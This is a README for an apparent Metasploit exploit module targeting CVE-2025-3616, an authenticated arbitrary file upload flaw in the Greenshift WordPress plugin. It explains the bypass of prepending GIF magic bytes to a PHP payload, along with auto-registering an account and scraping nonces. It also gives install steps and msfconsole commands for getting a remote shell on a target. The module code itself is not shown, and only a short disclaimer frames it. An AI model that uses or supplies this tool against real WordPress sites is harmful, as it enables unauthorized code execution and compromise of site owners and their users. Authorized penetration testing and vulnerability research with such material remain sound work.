# Metasploit Module: Greenshift WordPress Plugin Arbitrary File Upload (CVE-2025-3616)

This repository contains a Metasploit module to exploit **CVE-2025-3616**, an arbitrary file upload vulnerability in the Greenshift WordPress plugin (versions 11.4 through 11.4.5).

The exploit allows authenticated users (Subscriber+) to upload arbitrary files leading to Remote Code Execution (RCE). It bypasses the plugin's file type validation by spoofing the MIME type using GIF magic bytes (`GIF89a;`).

## Features

- **Authentication Handling**: Supports logging in with existing credentials (`USERNAME`/`PASSWORD`).
- **Auto-Registration**: Includes a `REGISTER` option to automatically register a new user and exploit the vulnerability using the fresh session cookies (useful if registration is enabled on the target).
- **Nonce Extraction**: Automatically scrapes the required `wp_rest` nonce from the administrative dashboard.
- **Security Bypass**: Prepends GIF magic bytes to the PHP payload to bypass `finfo_file()` verification.

## Installation

1.  Ensure you have Metasploit Framework installed.
2.  Copy `wp_greenshift_file_upload.rb` to your local modules directory:

    ```bash
    mkdir -p ~/.msf4/modules/exploits/unix/webapp/
    cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
    ```

3.  Start `msfconsole` and reload modules:

    ```bash
    msfconsole
    msf6 > reload_all
    ```

## Usage

### 1. Using Auto-Registration (Recommended)
If user registration is enabled on the target, you don't need credentials.

```bash
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER true
run
```

### 2. Using Existing Credentials
If you already have a valid user (Subscriber or higher):

```bash
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER false
set USERNAME <USER>
set PASSWORD <PASS>
run
```

## Options

| Option | Required | Description |
| :--- | :---: | :--- |
| **RHOSTS** | yes | The target address |
| **LHOST** | yes | The listen address (your IP) |
| **REGISTER** | no | Set to `true` to register a new account automatically (Default: `false`) |
| **USERNAME** | no | WordPress username (required if REGISTER is false) |
| **PASSWORD** | no | WordPress password (required if REGISTER is false) |
| **EMAIL** | no | Email for registration (optional, auto-generated if empty) |

## Disclaimer
This module is for educational purposes and authorized penetration testing only. Usage of this code for attacking targets without prior mutual consent is illegal.
